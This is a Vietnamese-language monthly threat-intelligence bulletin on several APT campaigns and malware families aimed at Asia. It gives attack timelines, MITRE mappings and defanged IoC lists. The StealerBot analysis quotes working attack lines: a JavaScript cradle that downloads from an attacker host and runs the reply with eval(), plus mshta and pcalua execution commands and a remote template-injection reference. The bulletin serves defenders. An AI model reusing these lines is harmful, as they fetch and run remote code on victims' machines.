Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết
1 Các mối đe dọa nâng cao – Advanced Threats
1.1 IcePeony APT nhắm mục tiêu vào các quốc gia khu vực Châu Á trong đó có Việt Nam
Các nhà nghiên cứu phát hiện nhóm tấn công IcePeony APT nhắm mục tiêu vào các cơ quan chính phủ, tổ chức học thuật, tổ chức chính trị ở các quốc gia khu vực Châu Á như Ấn Độ, Mauritius và Việt Nam. Các nhà nghiên cứu cho rằng các hoạt động của IcePeony APT dựa trên lợi ích chiến lược của Trung Quốc, hoạt động ít nhất kể từ 2023 liên quan đến chiến lược hàng hải của Trung Quốc. Vector ban đầu, kẻ tấn công sử dụng kỹ thuật SQL injection trên các máy chủ public-facing. Khi tìm được lỗ hổng, kẻ tấn công sẽ cài đặt webshell hoặc mã độc nhằm đánh cắp thông tin đăng nhập.
Kẻ tấn công sử dụng tệp zsh_history để ghi lại lịch sử lệnh, cấu hình một số lệnh trong file alias để đơn giản hóa các lệnh dài và cho phép truy cập nhanh các thông tin trợ giúp. Ví dụ bằng cách nhập “hPass”, kẻ tấn công có thể hiển thị hướng dẫn cơ bản cho Mimikatz, giúp nâng cao hiệu quả trong các cuộc tấn công
Mốc thời gian của nhóm tấn công trong khoảng 2 tuần, vào các ngày Chủ Nhật, kẻ tấn công không thực hiện bất kỳ hoạt động nào. Vào ngày đầu, kẻ tấn công thực hiện kỹ thuật SQL injection vào một số trang web của chính phủ. Khi khai thác thành công, kẻ tấn công cài đặt webshell hoặc IceCache, thiết lập quyền truy cập ban đầu. Đến ngày thứ 4, proxy rule được thiết lập thông qua IceCache. Ngày thứ 5 và thứ 6, kẻ tấn công mở rộng phạm vi bằng kỹ thuật SQL injection vào các trang web chính phủ khác, sử dụng nhiều công cụ khác nhau. Ngày thứ 8, kẻ tấn công sử dụng IceCache để đánh cắp thông tin từ môi trường bị xâm phạm. Ngày thứ 11, sử dụng công cụ như WmiExec và craXcel – công cụ open-source để mở các tệp được bảo vệ bằng password. Ngày thứ 12, kẻ tấn công sử dụng IceCache để thêm proxy rule và thiết lập persistence bằng các scheduled task. Ngày thứ 13 và 14, thực hiện khai thác các máy chủ khác.
Nhóm tấn công sử dụng nhiều công cụ/phần mềm độc hại khác nhau:
- Công cụ:
- StaX: đây là biến thể tùy chỉnh của công cụ open-source Stowaway, sử dụng Custom Base64 và AES để mã hóa
- ProxyChain: Đây là một công cụ open-source proxy. Kẻ tấn công sử dụng để chạy các file script trên máy chủ nạn nhân
- Phần mềm độc hại:
- IceCache: là một ELF64 binary được viết bằng ngôn ngữ GO, module IceCache được cài đặt và chạy trên máy chủ IIS được sử dụng để tấn công attack surface server.
- IceEvent: là một backdoor thụ động (passive-mode) được cài đặt dưới dạng service, có điểm tương đồng với IceCache về mã hóa và thực thi lệnh.
Indicator of Compromises (IoCs)
IP
165[.]22.211.62
64[.]227.133.248
173[.]208.156.19
173[.]208.156.144
154[.]213.17.225
103[.]150.186.219
63[.]141.255.16
204[.]12.205.10
107[.]148.37.63
103[.]99.60.119
154[.]213.17.237
45[.]195.205.88
154[.]213.17.244
103[.]99.60.93
149[.]115.231.17
149[.]115.231.39
103[.]99.60.108
Domain
d45qomwkl[.]online
k9ccin[.]com
k8ccyn[.]com
88k8cc[.]com
googlesvn[.]com
IceCache
484e274077ab6f9354bf71164a8edee4dc4672fcfbf05355958785824fe0468f
5b16d1533754c9e625340c4fc2c1f76b11f37eb801166ccfb96d2aa02875a811
ceb47274f4b6293df8904c917f423c2f07f1f31416b79f3b42b6d64e65dcfe1b
e5f520d95cbad6ac38eb6badbe0ad225f133e0e410af4e6df5a36b06813e451b
d1955169cd8195ecedfb85a3234e4e6b191f596e493904ebca5f44e176f3f950
11e90e2458a97957064a3d3f508fa6dadae19f632b45ff9523b7def50ebacb63
de8f58f008ddaa60b5cf1b729ca03f276d2267e0a80b584f2f0723e0fac9f76c
b8d030ed55bfb6bc4fdc9fe34349ef502561519a79166344194052f165d69681
535586af127e85c5561199a9a1a3254d554a6cb97200ee139c5ce23e68a932bd
0b8b10a2ff68cb2aa3451eedac4a8af4bd147ef9ddc6eb84fc5b01a65fca68fd
5fd5e99fc503831b71f4072a335f662d1188d7bc8ca2340706344fb974c7fe46
3eb56218a80582a79f8f4959b8360ada1b5e471d723812423e9d68354b6e008c
a66627cc13f827064b7fcea643ab31b34a7cea444d85acc4e146d9f2b2851cf6
0eb60e4c5dc7b06b719e9dbd880eb5b7514272dc0d11e4760354f8bb44841f77
IceEvent
80e831180237b819e14c36e4af70304bc66744d26726310e3c0dd95f1740ee58
9a0b0439e6fd2403f764acf0527f2365a4b9a98e9643cd5d03ccccf3825a732e
9aba997bbf2f38f68ad8cc3474ef68eedd0b99e8f7ce39045f1d770e2af24fea
bc94da1a066cbb9bdee7a03145609d0f9202b426a52aca19cc8d145b4175603b
1.2 Chiến dịch SHROUDED#SLEEP nhắm mục tiêu vào khu vực Đông Nam Á
Trong thời gian gần đây, ghi nhận chiến dịch SHROUDED#SLEEP được cho là do nhóm APT37 của Triều Tiên (còn được gọi là Reaper hoặc Group123) thực hiện, nhằm phát tán mã độc nhắm mục tiêu vào các quốc gia khu vực Đông Nam Á. Kẻ tấn công sử dụng email phishing có đính kèm file zip độc hại, kết hợp giữa các công cụ và kỹ thuật để vượt qua các biện pháp phòng thủ, thiết lập persistence trên hệ thống của mục tiêu.
Để khởi tạo truy cập, kẻ tấn công sử dụng tệp tin nén zip bên trong có chứa các tệp tin shortcut (.lnk) với phần mở rộng như .pdf.lnk hoặc .xlsx.lnk để lừa người dùng mở nhằm thực thi các đoạn mã độc hại khi được. Khi tệp shortcut này được thực thi, PowerShell sẽ được sử dụng để giải mã và thực thi các payload tiếp theo.
Payload tiếp theo sau khi được giải mã và trích xuất từ file .LNK bao gồm 3 tệp tin: tài liệu nhằm lừa nạn nhân e.xlsx (lure document) trong đường dẫn TEMP, tệp tin cấu hình d.exe.config và tệp tin DLL độc hại được trích xuất tại đường dẫn trong thư mục Windows startup
Với các mẫu đã phân tích, lure documents có nội dung liên đến quốc gia Campuchia, một tài liệu khác liên quan đến số liệu thống kê của nhiều lĩnh vực được viết bằng tiếng Khmer, ngôn ngữ có thể được sử dụng ở một số quốc gia Đông Nam Á như Thái Lan, Lào và Việt Nam.
Bằng cách sử dụng kỹ thuật AppDomainManager hijacking, kẻ tấn công có thể thực thi được DLL độc hại. DLL có nhiệm vụ tải xuống và thực thi thêm các payload JS ở giai đoạn tiếp theo. Đoạn mã JS có nhiệm vụ thu thập thông tin về computername và gửi HTTP GET request tới URL hxxp://208.85.16[.]88/wy/[computername].txt và chờ phản hồi từ phía server để thực thi ở giai đoạn tiếp theo
Các phản hồi từ máy chủ C&C sẽ được thực thi bằng hàm eval(), payload đóng vai trò như một RAT với các tính năng cho phép thu thập thông tin về các tệp tin, upload/download các payload mới, thay đổi regedit, nén và đánh cắp dữ liệu tới máy chủ C&C thông qua các POST request
MITRE ATT&CK
Tactics | Techniques |
Initial Access | T1566.001: Phishing: Spearphishing Attachment |
Collection | T1560: Archive Collected Data |
Command and Control | T1132: Data Encoding |
Credential Access | T1003: OS Credential Dumping
T1555: Credentials from Password Stores |
Defense Evasion | T1027: Obfuscated Files or Information
T1070.004: Indicator Removal: File Deletion T1112: Modify Registry T1574.014: Hijack Execution Flow: AppDomainManager |
Discovery | T1033: System Owner/User Discovery
T1057: Process Discovery T1069: Permission Groups Discovery: Domain Groups |
Execution | T1059.001: Command and Scripting Interpreter: PowerShell
T1059.007: Command and Scripting Interpreter: JavaScript T1204.001: User Execution: Malicious Link T1204.002: User Execution: Malicious File |
Persistence | T1053: Scheduled Task/Job
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Exfiltration | T1041: Exfiltration Over C2 Channel |
Indicator of Compromises (IoCs)
C2 and infrastructure
172.93.181[.]249 |
208.85.16[.]88 |
hxxps://jumpshare[.]com/view/load/crjl6ovj7HVGtuhdQrF1
hxxps://jumpshare[.]com/viewer/load/zB564bxDA3yG8PnFR90I |
Analyzed files/hashes
File Name | SHA256 |
Report on NGO Income_edit.zip | BEAF36022CE0BD16CAAEE0EBFA2823DE4C46E32D7F35E793AF4E1538E705379F |
Key Data 2023 Quarterly Cambodia Poll Appendix.zip | 913830666DD46E96E5ECBECC71E686E3C78D257EC7F5A0D0A451663251715800 |
Report on NGO Income_edit.xlsx.lnk | 9D0807210B0615870545A18AB8EAE8CECF324E89AB8D3B39A461D45CAB9EF957 |
Quarterly Cambodia Poll Appendix.pdf.lnk | CFBD704CAB3A8EDD64F8BF89DA7E352ADF92BD187B3A7E4D0634A2DC764262B5 |
d.exe.config | 55235BC9B0CB8A1BEA32E0A8E816E9E7F5150B9E2EEB564EF4E18BE23CA58434 |
DomainManager.dll | 106C513F44D10E6540E61AB98891AEE7CE1A9861F401EEE2389894D5A9CA96EF
6B95BC32843A55DA1F8186AEC06C0D872CAC13D9DF6D87114C5F8B7277C72A4F |
e.xlsx | 4E8B6DECCDFC259B2F77573AEF391953ED587930077B4EDB276DBBB679EF350B |
e.pdf | 50BF6FDBFF9BFC1702632EAC919DC14C09AF440F5978A162E17B468081AFBB43 |
ExcelDna.xll | AF74D416B65217D0B15163E7B3FD5D0702D65F88B260C269C128739E7E7A4C4D
7E9F91F0CFE3769DF30608A88091EE19BC4CF52E8136157E4E0A5B6530D510EC |
1.3 Chiến dịch triển khai biến thể FASTCash đánh cắp tiền từ ATM
Các nhà nghiên cứu phát hiện chiến dịch do Triều Tiên thực hiện sử dụng biến thể mới FASTCash nhằm lây nhiễm vào payment switch của các tổ chức tài chính và thực hiện các cuộc tấn công rút tiền mặt trái phép từ hệ thống ATM. Các biến thể trước đây của FASTCash nhắm vào các hệ thống Windows và IBM AIX (Unix), tuy nhiên gần đây ghi nhận biến thể mới nhắm vào các Ubuntu 22.04 LTS. Mã độc được ghi nhận lần đầu vào tháng 10/2018 do nhóm tấn công Triều Tiên sử dụng trong các cuộc tấn công nhằm rút tiền mặt từ ATM, nhắm vào ít nhất 30 ngân hàng khu vực Châu Phi và Châu Á kể từ 2016.
Theo các cuộc điều tra, biến thể FASTCash được triển khai dưới dạng shared library được inject vào payment switch server thông qua lệnh call hệ thống ptrace, chặn các thông báo giao dịch ISO8583. Mã độc chặn các request “từ chối” do tài khoản chủ thẻ không đủ số dư và thay thế bằng “phê duyệt”, cho phép các giao dịch trái phép tại ATM và PoS terminals. Số tiền ngẫu nhiên được tạo cho mỗi giao dịch gian lận và được chèn trong tin nhắn chỉnh sửa dao động khoảng 12.000 đến 30.000 Lira Thổ Nhĩ Kỳ (tương đương 350 đô la đến 875 đô la). Sau khi tin nhắn giao dịch được sửa đổi để hiển thị mã phê duyệt và số tiền, các ngân hàng sẽ phê duyệt giao dịch và cho phép rút tiền mặt từ các hệ thống ATM.
Indicator of Compromise (IoCs)
SHA-256 hashes
FASTCash for Linux
f34b532117b3431387f11e3d92dc9ff417ec5dcee38a0175d39e323e5fdb1d2c
7f3d046b2c5d8c008164408a24cac7e820467ff0dd9764e1d6ac4e70623a1071 (UPX)
FastCash for Windows
afff4d4deb46a01716a4a3eb7f80da58e027075178b9aa438e12ea24eedea4b0
f43d4e7e2ab1054d46e2a93ce37d03aff3a85e0dff2dd7677f4f7fb9abe1abc8
5232d942da0a86ff4a7ff29a9affbb5bd531a5393aa5b81b61fe3044c72c1c00
2611f784e3e7f4cf16240a112c74b5bcd1a04067eff722390f5560ae95d86361
c3904f5e36d7f45d99276c53fed5e4dde849981c2619eaa4dbbac66a38181cbe
609a5b9c98ec40f93567fbc298d4c3b2f9114808dfbe42eb4939f0c5d1d63d44
078f284536420db1022475dc650327a6fd46ec0ac068fe07f2e2f925a924db49 (RAR)
Previously identified / attributed (2018 to 2020)
129b8825eaf61dcc2321aad7b84632233fa4bbc7e24bdf123b507157353930f0 (Windows)
10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba (AIX)
3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c (AIX)
1.4 Ứng dụng di động giả mạo nhắm mục tiêu vào khu vực Châu Á – Thái Bình Dương
Các nhà nghiên cứu đã phát hiện một số ứng dụng di động giả mạo nhắm mục tiêu vào khu vực Châu Á – Thái Bình Dương, Châu Âu, Trung Đông và Châu Phi. Sử dụng kỹ nghệ xã hội, kẻ tấn công lừa người dùng mở tài khoản giao dịch giả mạo và thu lợi tài chính. Đây là một trong những ứng dụng giả mạo được upload trên Apple Store. Tuy nhiên, ứng dụng đã bị gỡ bỏ sau vài tuần.
Sau khi ứng dụng này được gỡ bỏ trên Apple App Store, kẻ tấn công sử dụng phishing websites, cung cấp bản download hệ điều hành Android và iOS. Đối với iOS, khi người dùng click download, file .plist sẽ được tải xuống và yêu cầu cấp quyền cài đặt ứng dụng.
Để đăng ký ứng dụng, người dùng cần xác thực các thông tin nhận dạng bao gồm căn cước hoặc hộ chiếu, cung cấp thông tin cá nhân và thông tin liên quan đến công việc. Sau khi đồng ý các điều khoản, kẻ tấn công hướng dẫn người dùng nạp tiền vào tài khoản và thực hiện đánh cắp tiền của nạn nhân.
Các ứng dụng web được phát triển trên UniApp, kết hợp với các thành phần ban đầu, vì vậy kẻ tấn công có thể triển khai trên nhiều nền tảng khác nhau.
Trước khi hiển thị trang đăng nhập, ứng dụng cần thực hiện một số lần kiểm tra như kiểm tra kiểu máy, kiểm tra ngày và giờ hiện tại… Trong trường hợp các kiểm tra đều thành công, ứng dụng sẽ lấy địa chỉ của ứng dụng web. Cấu hình của ứng dụng này được nhúng vào cuối của trang HTML, chứa trong ký hiệu ## và được tách bởi dấu phẩy. Tham số thứ hai là địa chỉ ứng dụng web được đặt.
Ứng dụng được phân phối thông qua Apple App Store, hoạt động như một downloader, chỉ lấy và hiển thị URL ứng dụng web. Một ứng dụng khác được tải xuống từ các website phishing, được viết bằng ngôn ngữ JavaScript, bao gồm các tính năng như cài đặt tài khoản, các biểu mẫu để tải thẻ ngân hàng và giấy tờ tùy thân, lịch sử giao dịch, danh sách các cổ phiếu có sẵn… Khi giao diện web được mở trong ứng dụng di động, giao tiếp với máy chủ được thiết lập thông qua WebSocket.
Indicator of Compromise (IoC)
Files:
e74392a807f0ad180c6a80aafd198b7ef4ad0581
0e2f85f1c7705e795ed9c2491ce628fac411fcfc
0179e333287fe6d87a76f4b4d90602f54e833379
cfae03202181664723a2133fda7e74079b0e5f0e
34f93e7e4d74852c647978e3195a1de79eaba3ff
8b2fdbc0050b9840c404a49373d802586acc82ea
URLs:
hXXps://www.upstoxcalculator[.]com
hXXps://www.yupstocks[.]com/h5/#/login
hXXps://a.gold-blockchain[.]cc/app/home/getH5
1.5 Chiến dịch tấn công do nhóm đe dọa Việt Nam thực hiện nhắm mục tiêu vào các chuyên gia tiếp thị kỹ thuật số
Các nhà nghiên cứu phát hiện chiến dịch tấn công do nhóm đe dọa Việt Nam thực hiện, nhắm mục tiêu vào người lao động tìm việc làm và các chuyên gia tiếp thị kỹ thuật số Để truy cập ban đầu vào hệ thống, kẻ tấn công sử dụng email spam có đính kèm tệp LNK độc hại, giả mạo dưới dạng PDF. Sau khi nạn nhân mở tệp, tệp LNK sẽ kích hoạt các lệnh Powershell dẫn đến tải xuống và thực thi các tập lệnh bổ sung được lưu trữ trên Dropbox, cuối cùng thực thi Quasar RAT nhằm chiếm quyền kiểm soát toàn bộ hệ thống, thực hiện các hoạt động như đánh cắp dữ liệu, triển khai thêm phần mềm độc hại…. Thông qua việc sử dụng nhiều kỹ thuật khác nhau từ đó kẻ tấn công lẩn tránh sự phát hiện, thiết lập persistence trên hệ thống bị ảnh hưởng.
Các nhà nghiên cứu cho rằng chiến dịch này có liên quan đến các hoạt động do nhóm đe dọa người Việt Nam thực hiện từ tháng 7/2022 nhằm phát tán mã độc Ducktail, sau đó mở rộng thông qua sử dụng Malware-as-a-Service (MaaS).
Indicators of Compromise (IoCs)
Indicators | Indicator Type | Description |
dc616cc55a345e448a058368aea7c99ab9dd2a9c8ec42674312b66dbc29b7878 | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.rar |
3de5e0b27c69c93b4c4b4812ed4453d4b81e99b7d407640a752e62e33b1ede2a | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical/Career_
Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.lnk |
hxxps://www.dropbox.com/scl/fi/9p8no6tz85e09vg59kfwk/sav2_encrypt.txt?rlkey=hw7c83mq8uws216q3d4b1cfyi&st=4oycb9or&dl=1 | URL | URL from LNK |
9a00d0859bc7a81d6e289a414c39aa2bd95319fa3d1d0e5f1be6d348604d640c | SHA-256 | payload_1.ps1 (downloaded from Dropbox) |
b35452610c2cbc5a6a2bebd82af7c3883037b40be7072e43fc5989298bb26ea5 | SHA-256 | PositionApplied_VoyMedia.pdf <space> .lnk |
d8bc59a1acf2f9a14a2fb96de979672dbed27d798eecc9454021f352f2bf973a | SHA-256 | PositionApplied_VoyMedia.rar |
16ef774020e5754e4a8890789b7c798376a9521823c8897f9c97af5b33b27013 | SHA-256 | payload_1.bin |
8229f281a93f18612a47843aa69e94312b52180e7f775fd58e5ea04608e23bd0 | SHA-256 | LNK file delivers stromkitty |
1.6 CeranaKeeper nhắm mục tiêu khu vực Đông Nam Á
Các nhà nghiên cứu phát hiện tác nhân đe dọa liên kết với Trung Quốc, được đặt tên là CeranaKeeper nhắm mục tiêu vào tổ chức chính phủ khu vực Thái Lan. CeranaKeeper hoạt động ít nhất từ đầu năm 2022, chủ yếu nhắm mục tiêu vào các thực thể chính phủ ở các quốc gia Châu Á như Thái Lan, Myanmar, Philippines, Nhật Bản và Đài Loan. Kẻ tấn công sử dụng công cụ bespoke stagers (hay TONESHELL), các kỹ thuật side-loading và các chuỗi lệnh nhằm đánh cắp thông tin.
Sau khi giành được quyền truy cập vào mạng lưới của tổ chức, kẻ tấn công thực hiện các cuộc tấn công brute-force vào máy chủ domain controller trong mạng cục bộ. Khi có được đặc quyền, kẻ tấn công cài backdoor TONESHELL, triển khai công cụ nhằm trích xuất thông tin đăng nhập và sử dụng Avast driver cùng 1 số ứng dụng nhằm vô hiệu hóa các sản phẩm bảo vệ trên máy. Từ máy chủ bị xâm nhập này, kẻ tấn công sử dụng console quản trị từ xa để triển khai và thực thi backdoor trên các máy tính khác trong mạng. Ngoài ra, kẻ tấn công khai thác domain controller để chiếm quyền quản trị, triển khai BAT script trên toàn mạng, mở rộng phạm vi đến các máy khác có trong domain nhằm thực hiện thu thập dữ liệu hàng loạt.
Một số công cụ và backdoor được kẻ tấn công triển khai:
+ WavyExfiller: Module này có 3 chức năng chính:
- Lấy mã thông báo Dropbox được mã hóa từ Pastebin – một dịch vụ trực tuyến để lưu trữ và chia sẻ dữ liệu
- Tạo kho lưu trữ có mật khẩu để bảo vệ các tài liệu được tìm thấy trong thư mục người dùng.
- Upload kho lưu trữ lên Dropbox
Vào tháng 10/2023, một biến thể được lưu trữ tên oneDrive.exe, phiên bản này sử dụng dịch vụ chia sẻ tệp PixelDrain để trích xuất các tệp đã lưu trữ. Biến thể này kiểm tra ổ C, cố gắng thu thập các tệp từ các ổ đĩa đã được ánh xạ. Nếu có từ chữ D đến N (trừ chữ L), sẽ biểu thị các thiết bị lưu trữ ngoài được kết nối như USB, ổ cứng, ổ đĩa mạng…
+ DropboxFlop: Đây là một reverse shell có khả năng upload và download. Tệp Python được biên dịch là pyc. Backdoor truy xuất Dropbox token được mã hóa, phụ thuộc vào các tệp có trong kho lưu trữ Dropbox dể thực thi các lệnh trên máy. Kiểm tra các tệp có tên “tasks”, nếu tìm thấy sẽ được tải xuống và phân tích dưới dạng file JSON. Có hai loại task được triển khai: thực thi lệnh và upload file. Sau khi hoàn tất, backdoor sẽ cập nhật nội dung của tệp output.
+ OneDoor: hoạt động tương tự như backdoor DropboxFlop, tuy nhiên sử dụng OneDrive REST API của Microsoft Graph API để nhận lệnh và trích xuất tệp. OneDoor sẽ tạo một file log và truy cập tệp ini. Nếu không tồn tại tệp, OneDoor sẽ sử dụng buffer được hardcode. File/buffer bắt đầu bằng một key và vector khởi tạo, sử dụng thuật toán AES-128 ở chế độ CBC (Cipher Block Chaining) để giải mã dữ liệu.
+ BingoShell: là một backdoor được viết bằng Python sử dụng GitHub để kiểm soát các máy bị xâm phạm.
Indicator of Compromises (IoC)
Files
SHA-256 | Filename | Detection | Description |
B25C79BA507A256C9CA12A9BD34DEF6A33F9C087578C03D083D7863C708ECA21 | EACore.dll | Win32/Agent.VJO | YK0130 reverse shell. |
E7B6164B6EC7B7552C93713403507B531F625A8C64D36B60D660D66E82646696 | SearchApp.exe | Python/Agent.AGT | WavyExfiller |
3F81D1E70D9EE39C83B582AC3BCC1CDFE038F5DA31331CDBCD4FF1A2D15BB7C8 | OneDrive.exe | Win32/Agent.VKV | OneDoor. |
DAFAD19900FFF383C2790E017C958A1E92E84F7BB159A2A7136923B715A4C94F | dropbox.exe | Python/Agent.AQN | PyInstaller DropFlop. |
24E12B8B1255DF4E6619ED1A6AE1C75B17341EEF7418450E661B74B144570017 | Update.exe | Python/Agent.AJJ | BingoShell. |
451EE465675E674CEBE3C42ED41356AE2C972703E1DC7800A187426A6B34EFDC | oneDrive.exe | Python/Agent.AGP | WavyExfiller PixelDrain variant. |
E6AB24B826C034A6D9E152673B91159201577A3A9D626776F95222F01B7C21DB | MsOcrRes.orp | Win32/Agent.AFWW | TONESHELL type B. |
6655C5686B9B0292CF5121FC6346341BB888704B421A85A15011456A9A2C192A | avk.dll | Win32/Agent.VJQ | TONESHELL variant. |
B15BA83681C4D2C2716602615288B7E64A1D4A9F4805779CEBDF5E6C2399AFB5 | TurboActivate.dll | Win32/Agent.AFWX | TONESHELL loader. |
Network
IP | Domain | Hosting provider | First seen | Details |
104.21.81[.]233 172.67.165[.]197 |
www.toptipvideo[.]com | CLOUDFLARENET (AS13335) | 2023‑08‑14 | C&C server for the YK0130 reverse shell. |
103.245.165[.]237 | dljmp2p[.]com inly5sf[.]com |
Bangmod Enterprise administrator (AS58955) | 2023‑04‑21 | C&C servers for TONESHELL variants. |
103.27.202[.]185 | www.dl6yfsl[.]com | Bangmod Enterprise administrator (AS58955) | 2023‑08‑10 | C&C server for TONEINS variant. |
103.27.202[.]185 | www.uvfr4ep[.]com | Bangmod Enterprise administrator (AS58955) | 2023‑09‑22 | C&C server for TONEINS variant. |
2 Malware
2.1 Mã độc StealerBot được nhóm APT SideWinder sử dụng
SideWinder, nhóm APT hoạt động từ 2012 nhắm mục tiêu tới các đơn vị thuộc Nam Á và Đông Nam Á, nhắm chính vào lĩnh vực quân sự và đơn vị chính phủ tại Pakistan, Sri Lanka, China và Nepal. Gần đây, Kaspersky ghi nhận nhóm APT mở rộng tấn công sang các khu vực Trung Đông và Châu Phi, quá trình phân tích phát hiện thêm các sample mới chưa ghi nhận trước đó tạm gọi tên là StealerBot, với các module nâng cao được phát triển riêng cho các hoạt động gián điệp.
Phương thức khởi tạo
Nhóm tấn công sử dụng email phishing có đính kèm các tệp tin độc hại làm phương thức chính để phát tán mã độc. Hai định dạng phổ biến được sử dụng là tài liệu Microsoft hoặc tệp tin nén ZIP bên trong có chứa file LNK độc hại. Khi thực thi, các tài liệu độc hại hoặc tệp tin LNK có đa dạng cách thức triển khai thông qua nhiều giai đoạn sử dụng JavaScript và .Net downloader nhằm triển khai payload cuối cùng là StealerBot
Đối với các tài liệu, nhóm tấn công sử dụng kỹ thuật Template Injection, tải xuống các tệp tin RTF lưu trữ trên máy chủ của kẻ tấn công
<Relationship Id=”fid872″ Type=http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleobject” Target=https://www-opmcm-gov-np.direct888.net/552565_26thMangsir2080/file.rtf TargetMode=”External”/> |
Tệp tin RTF khai thác lỗ hổng CVE-2017-11882 trong Microsoft Office, shellcode sử dụng đa dạng cách thức gây khó khăn cho quá trình phân tích:
- Sử dụng GlobalMemoryStatusEx nhằm xác định kích thước bộ nhớ, nếu bộ nhớ ít hơn 2GB, quá trình thực thi sẽ kết thúc.
- Sử dụng CPUID instruction để xác định thông tin về bộ vi xử lý, nếu CPU không phải Intel hoặc AMD, quá trình thực thi cũng sẽ kết thúc.
- Thử gọi đến thư viện “dotnetlogger32.dll”, nếu DLL này tồn tại trong hệ thống thì quá trình thực thi cũng sẽ kết thúc
Shellcode thực hiện một số hành động chính sau:
- Load thư viện mshtml.dll và lấy thông tin con trỏ hàm RunHTMLApplication
- Giải mã JS có trong shellcode với thuật toán XOR, key XOR có giá trị 0x12 và ghi đè tham số này trong process commandline hiện tại
- Gọi tới hàm RunHTMLApplication để thực thi code
javascript:eval(“v=ActiveXObject;x=new v(\”WinHttp.WinHttpRequest.5.1\”);x.open(\”GET\”,
\”hxxps://mofa-gov-sa.direct888[.]net/015094_consulategz\”,false);x.Send();eval(x.ResponseText); |
Một cách thức khởi tạo khác là sử dụng tệp tin nén ZIP bên trong có tệp LNK độc hại, LNK trỏ đến mshta.exe để thực thi đoạn mã JS độc hại. Cả hai cách thức này đều thực thi cùng một đoạn mã JS
Downloader
JS giải mã payload được encoded base64, sau giải mã thu được thư viện DLL .NET có tên App.dll. DLL là downloader để truy xuất thêm payload .NET khác, thực thi bằng cách gọi tới method Programs.Work() với 3 tham số: C2_URL, payload_filename và payload_data
App.dll sẽ thu thập thông tin về các sản phẩm bảo mật bao gồm Avast và AVG trên máy nạn nhân và gửi thông tin này tới C2. Nếu payload_data khác “null”, dữ liệu sẽ được giải mã theo thuật toán base64+gzip và lưu vào thư mục Temp với tên tệp tin được chỉ định trong payload_filename. Nếu phát hiện máy nạn nhân sử dụng các sản phẩm bảo mật, payload mới sẽ được thực thi thông qua WScript.Shell object, nếu không sẽ được thực thi thông qua pcalua.exe
mshta.exe “javascript:WshShell = new ActiveXObject(“WScript.Shell”);WshShell.Run(“%TEMP%\%Payload_filename%”, 1, false);window.close()
————————- pcalua.exe -a %TEMP%\%Payload_filename% |
Nếu tham số C2_URL được cung cấp, mã độc sẽ tải xuống một payload khác tại URL được chỉ định, payload sẽ được giải mã bằng thuật toán XOR với khóa giải mã là 32bytes đầu tiên. Sau giải mã thu được DLL độc hại .NET khác có tên “ModuleInstaller.dll”
ModuleInstaller
ModuleInstaller được thiết kế để drop ít nhất 4 tệp tin bao gồm: 01 tệp tin hợp pháp có chữ ký được sử dụng để sideload các DLL độc hại, 01 tệp tin .config được nhúng trong phần resource, 01 DLL độc hại và 01 payload đã bị mã hóa. Mã độc thực hiện thu thập các thông tin trên hệ thống bị lây nhiễm bao gồm: Tên người dùng hiện tại, tên máy chủ, LocalIP, hệ điều hành cài đặt và kiến trúc, tên bộ vi xử lý và số lượng cores, tên và kích thước đĩa. Các thông tin này sẽ được mã hóa theo base64 và gửi tới URL C2, có nhiều hơn 1 đường dẫn URL được cấu hình trong mã độc, format như sau:
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<data_info> |
C2 sẽ phản hồi lại thông tin payload với các giá trị cấu hình đi kèm, các giá trị này khác nhau tùy thuộc vào quá trình lây nhiễm ban đầu
Backdoor loader module
DLL được thực thi thông qua tệp tin exe hợp pháp, truy xuất và giải mã payload và tải vào bộ nhớ. Backdoor sử dụng nhiều phương pháp gây khó khăn cho quá trình phân tích như kỹ thuật Control Flow Flattening, các chuỗi được mã hóa với XOR hoặc Triple DES. Mã độc cũng chứa các kỹ thuật anti sanbox, patching hàm AmsiScanBuffer trong “amsi.dll” nhằm lẩn tránh sự phát hiện.
StealerBot
Đây là tệp tin .NET được load trong bộ nhớ thông qua backdoor loader module, chịu trách nhiệm giao tiếp với C2, thực thi và quản lý các plugin, module khác như
- Cài đặt thêm các mã độc khác
- Chụp ảnh màn hình: chụp ảnh màn hình chính theo định kỳ
- Keylogger
- Đánh cắp mật khẩu từ trình duyệt
- Intercept RDP để đánh cắp thông tin tài khoản xác thực
- Đánh cắp file.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
- Khởi tạo reverse shell
- Leo thang đặc quyền bypass UAC
Keylogger: sử dụng SetWindowsHookEx trong thư viện user32.dll, cho phép ghi lại các thao tác với bàn phím, nội dung clipboard và tiêu đề cửa sổ đang hoạt động
Đánh cắp file: thu thập các tệp tin từ các thư mục cụ thể, rà quét ổ đĩa và đánh di động để đánh cắp các tệp tin có phần mở rộng như .ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
Live Console: Cho phép thực thi các câu lệnh tùy ý trên hệ thống nạn nhân, kết nối C2 để nhận lệnh, cũng cho phép sử dụng các câu lệnh tùy chỉnh để thực hiện
- Kill tiến trình (bao gồm cả việc tự kill tiến trình của bản thân)
- Tải xuống thêm các tệp tin bổ sung
- Thêm các cấu hình exclude trong Windows Defender
- Lây nhiễm cho những user khác trong local system
- Tải xuống và thực thi các HTML
- Thu thập thông tin người dùng thông qua các popup giả mạo.
- Tải thêm các module
RDP Credential Stealer: Module bao gồm các thành phần thư viện .NET, shellcode và thư viện C++. Monitor các project đang thực thi và inject mã độc hại vào tiến trình mstsc.exe để đánh cắp thông tin xác thực khi người dùng thực hiện RDP, thông tin sẽ được gửi tới pipename “c63hh148d7c9437caa0f5850256ad32c”
Token Grabber: được sử dụng để đánh cắp cookie trình duyệt và mã thông báo xác thực của các ứng dụng Facebook, Linkedln và Google (Gmail, Google Drive…)
